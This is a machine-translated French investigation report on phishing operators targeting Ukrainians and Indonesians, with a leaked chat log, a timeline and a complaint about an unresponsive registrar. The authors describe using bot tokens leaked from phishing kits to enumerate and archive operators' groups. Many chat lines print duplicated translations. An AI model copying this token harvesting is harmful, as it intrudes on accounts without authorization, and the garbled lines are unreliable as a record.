Note de la rédaction : Bonya le sent venir. Supposons qu’il soit russe et qu’il considère qu’escroquer l’Ukraine est un acte « patriotique ». Qu’en est-il alors de l’Indonésie — un
Partenaire du BRICS depuis octobre 2024 (Sommet de Kazan) ? Est-ce également un acte patriotique que de voler les citoyens de ses alliés ? Les escrocs de la CEI sont des voleurs qui ne font aucune distinction, dépourvus d'intelligence et de loyauté. Lisez nos autres enquêtes dans lesquelles nous avons mis en évidence
procédures judiciaires pour les opérateurs similaires, la conclusion est toujours la même.
MOI
MONETTI ESCOBAR25-03-2026 13:12:49
Oui, je vois ce que tu veux dire.Oui, je vois bien
MOI
MONETTI ESCOBAR25-03-2026 13:12:55
Va te faire foutre.Tu racontes n'importe quoi
B
Bonya25-03-2026 13:13:09
Bon, se faire vider de son énergie, ce n'est pas vraiment passionnant non plus.Bon, être bourrés, c'est pas vraiment génial non plus
MOI
MONETTI ESCOBAR25-03-2026 13:13:13
Il ne fera rienIl ne fera rien.
MOI
MONETTI ESCOBAR25-03-2026 13:13:18
Qu'est-ce qu'il va faire ?Qu'est-ce qu'il va vendre ?
D
Devoys25-03-2026 13:13:26
de quoi s'agit-il ?qu'est-ce que c'est ?
MOI
MONETTI ESCOBAR25-03-2026 13:13:34
Ouais, un type s'est inscritOui, il s'est joint à nous
D
Devoys25-03-2026 13:13:34
d'oùd'où
B
Bonya25-03-2026 13:13:35
Même si tu t'es connecté au site de hameçonnage plusieurs fois depuis ta propre adresse IP, ça ne passe plus.Même si je me suis connecté à Fish deux ou trois fois depuis mon adresse IP, ça n'a plus rien d'amusant
MOI
MONETTI ESCOBAR25-03-2026 13:13:37
Au groupeVers le groupe
MOI
MONETTI ESCOBAR25-03-2026 13:13:38
XzХз
D
Devoys25-03-2026 13:13:39
lors de l'interpolationquand, à Interpol
D
Devoys25-03-2026 13:13:41
à laquelleà quelle
MOI
MONETTI ESCOBAR25-03-2026 13:13:44
Celui-ciCette
B
Bonya25-03-2026 13:13:46
Je suis juste venu ici pour discuterViens vite dans le chat
B
Bonya25-03-2026 13:13:49
Il a écrit queIl a écrit : « »
MOI
MONETTI ESCOBAR25-03-2026 13:13:56
.
B
Bonya25-03-2026 13:13:57
Bonjour, il suffit d'enregistrer vos données, attendez une minute
MOI
MONETTI ESCOBAR25-03-2026 13:14:11
[Photo partagée]
D
Devoys25-03-2026 13:14:31
Je les ai déjà vus.J'en ai déjà vu comme ça
B
Bonya25-03-2026 13:14:44
Bon, on s'est fait prendre avec le bot « ukr » aussi.Bon, on s'est fait avoir par un bot ukrainien
B
Bonya25-03-2026 13:14:55
Tu n'as pas envoyé de message dans le salon de discussion.On n'a pas écrit ça dans le chat
B
Bonya25-03-2026 13:14:57
N'as-tu pas écritMais non, ils ont écrit
MOI
MONETTI ESCOBAR25-03-2026 13:15:04
J'en ai rien à foutre.Et puis merde
B
Bonya25-03-2026 13:15:06
Au nom de la chaîneAu nom de la chaîne
D
Devoys25-03-2026 13:15:23
Laisse tomber, putain.et puis merde
MOI
MONETTI ESCOBAR25-03-2026 13:15:31
Je vais démanteler ce groupeJe supprime ce groupe
B
Bonya25-03-2026 13:15:35
+
D
Devoys25-03-2026 13:15:35
ouioui
— Groupe supprimé par son propriétaire —
Le groupe a été supprimé en quelques minutes. Le message d'adieu de Bonya — « + » — et la réponse affirmative de Devoys — « ouais » — en disent long : Ils savaient qu'ils avaient été démasqués, et leur seule option était de détruire les preuves. Mais à ce moment-là, les données avaient déjà été enregistrées.
Notez le commentaire révélateur de Bonya : « On s'est aussi fait attaquer par le bot ukrainien » — ce qui confirme que les deux projets (ukrainien et indonésien) sont gérés par la même équipe d'opérateurs, et que ce n'était pas la première fois que leur infrastructure était compromise.
Section 8 : Ce que cela montre
Chaque nom de domaine qui apparaît sur enablers.report passe par ce processus automatisé. [REDACTED][.]sbs n'a pas fait exception.
Détection
Analyse statique
Cartographie des infrastructures
À la découverte des origines
OSINT
Génération de rapports
Chronologie de l'enquête
21 mars 2026
Analyse entièrement automatisée terminée : cartographie de l'infrastructure effectuée, bundle JS désobfusqué, protocole WebSocket documenté
22 mars 2026
Adresse IP d'origine identifiée. Deuxième projet de hameçonnage (« HealthCare ID ») découvert sur le même serveur
22 mars 2026
À nu
config.json permet d'identifier l'opérateur via l'API
[REDACTED] Bot
23 mars 2026
Signalements d'abus transmis au fournisseur d'hébergement, à
IANA #1910 et aux CERT concernés
25 mars 2026
Article publié. Les rapports sur les domaines sont désormais disponibles sur
THE ENABLERS REGISTRY Comment cela a-t-il été possible ? Le réseau d'intelligence artificielle de THE ENABLERS REGISTRY
Cette enquête a été menée dans son intégralité par systèmes automatisés. Le pipeline de THE ENABLERS REGISTRY ne se contente pas de détecter les domaines de hameçonnage : il s'infiltre dans l'infrastructure des opérateurs qui les gèrent.
Actif
Certains bots font toujours l'objet d'une surveillance
Depuis 2024
Collecte en cours
Lorsque des kits de hameçonnage divulguent les jetons de bots [REDACTED] — comme celui-ci l'a fait via config.json — notre système les collecte automatiquement, recense les groupes d'opérateurs, extrait les listes de membres et archive l'historique des messages. Plus de 2 000 bots sont collectées de cette manière depuis 2024. Certaines sont toujours actives, et nous prenons plaisir à observer les criminels à l'œuvre en temps réel — car le dénouement est déjà écrit.
Même les utilisateurs qui suppriment leur compte ou effacent leurs groupes agissent trop tard. Au moment où ils cèdent à la panique, nous avons déjà tout en notre possession : les archives de messages, les données de profil, les groupes auxquels ils appartiennent, les bots connectés. La suppression ne change rien. Ces données existaient déjà, et elles figurent désormais dans notre base de données.
« Attends-moi » — Édition « Arnaqueurs »
Ce cas n'est pas un cas isolé : il illustre bien négligence systématique de la part de IANA #3765 que nous avons décidé de présenter comme exemple de « méga-hackers ». Comme « Типичный Мошенник » l'a justement souligné : il y a une différence entre les hackers et les escrocs — intelligence. Ces opérateurs ne sont ni des pirates informatiques ni des gens intelligents.
Les systèmes de THE ENABLERS REGISTRY collectent automatiquement ce type de preuves sur des milliers de domaines : ils repèrent les bots, archivent les communications des opérateurs et cartographient les infrastructures. Ce cas particulier était tout simplement trop absurde pour ne pas être rendu public. Le kit de possibly phishing est d'une qualité très basique, la sécurité opérationnelle (OPSEC) est inexistante, et les opérateurs ont supprimé leur groupe dans la précipitation, quelques minutes seulement après sa découverte.
Nous développons actuellement un système qui affichera les identités vérifiées des opérateurs, directement sur les pages de rapports relatives aux domaines — de l'arnaqueur à la victime, comme dans l'émission de télévision russe « Жди Меня » (Attends-moi), mais à l'envers. Elle fonctionne en mode privé depuis 2024. De nombreux opérateurs ont déjà été identifiés — y compris ceux qui ont supprimé leurs comptes. Nous sommes en train de déterminer les plus intéressant façon de le présenter. Restez à l'écoute.
Domaines associés
Notre analyse a permis d'identifier un deuxième domaine — hlpforvpeople[.]sbs — enregistrés auprès du même registraire et présentant des structures identiques. Ces deux domaines figurent dans notre base de données :
La société [REDACTED] (Hong Kong) a reçu plusieurs signalements détaillés d'abus de THE ENABLERS REGISTRY concernant ces deux points [REDACTED][.]sbs et hlpforvpeople[.]sbs. Au moment de la publication — 5 jours après le premier signalement — aucune mesure n'a été prise. Les deux domaines restent pleinement opérationnels.
Ce n'est pas un cas isolé. Le IANA #3765 est un problème récurrent dans nos enquêtes. L'adresse de contact chargée des signalements d'abus auprès du registraire (abuse@IANA #3765) ne réagit systématiquement pas aux signalements de hameçonnage étayés par des preuves. Bien qu'il s'agisse d'un bureau d'enregistrement accrédité par l'ICANN et soumis aux dispositions de l'accord d'accréditation des bureaux d'enregistrement (RAA §3.18), IANA #3765 opère en toute impunité apparente.
IANA #3765 assure une présence en russe et commercialise .ru des noms de domaine à des prix élevés (environ 200 $), et communique avec ses clients via VK et [REDACTED] — des plateformes très prisées par le public russophone. Le fait que sa clientèle recoupe celle des communautés clandestines soulève de sérieuses questions : l'absence de réponse de ce registraire aux signalements d'abus relève-t-elle de la négligence ou d'une stratégie commerciale délibérée ?
Cette enquête a été publiée en partie en raison de l'inaction prolongée de IANA #3765. Lorsque les bureaux d'enregistrement refusent d'intervenir face aux abus liés au possibly phishing, la dénonciation publique devient le seul mécanisme de responsabilisation qui reste.
Points clés à retenir
- L'automatisation est le seul moyen de suivre le rythme. Les kits de possibly phishing sont déployés et rendus opérationnels en quelques heures. L'analyse manuelle ne peut pas suivre ce rythme.
- Les opérateurs font des erreurs. Un fichier de configuration accessible à tous sur un projet secondaire a permis de démanteler toute une opération de hameçonnage à l'échelle internationale. Il est difficile de garantir une sécurité opérationnelle (OPSEC) irréprochable sur l'ensemble des projets.
- L'ingénierie sociale évolue au gré de l'actualité. La guerre, l'aide humanitaire et les programmes gouvernementaux sont de plus en plus utilisés comme appâts dans les attaques de hameçonnage, car ils ciblent des personnes en situation de détresse qui sont moins enclines à remettre en question la légitimité de ces initiatives.
- La réutilisation des infrastructures est la norme. Un serveur, deux projets de hameçonnage, deux pays, les mêmes opérateurs. Cartographier les connexions entre les infrastructures permet d'en savoir bien plus que l'analyse isolée d'un seul domaine.
Recherches connexes
D'autres enquêtes issues du pipeline de renseignements automatisé de THE ENABLERS REGISTRY
Avertissement : Cette enquête a été menée exclusivement à l'aide de techniques de reconnaissance passive et d'API publiques. Aucun accès non autorisé à un quelconque système n'a été effectué. Les appels à l'API du bot [REDACTED] utilisaient un jeton rendu public par les opérateurs via un point de terminaison ne nécessitant aucune authentification. Tous les noms de domaine mentionnés dans cet article ont été anonymisés conformément aux conventions standard en matière de sécurité de l'information.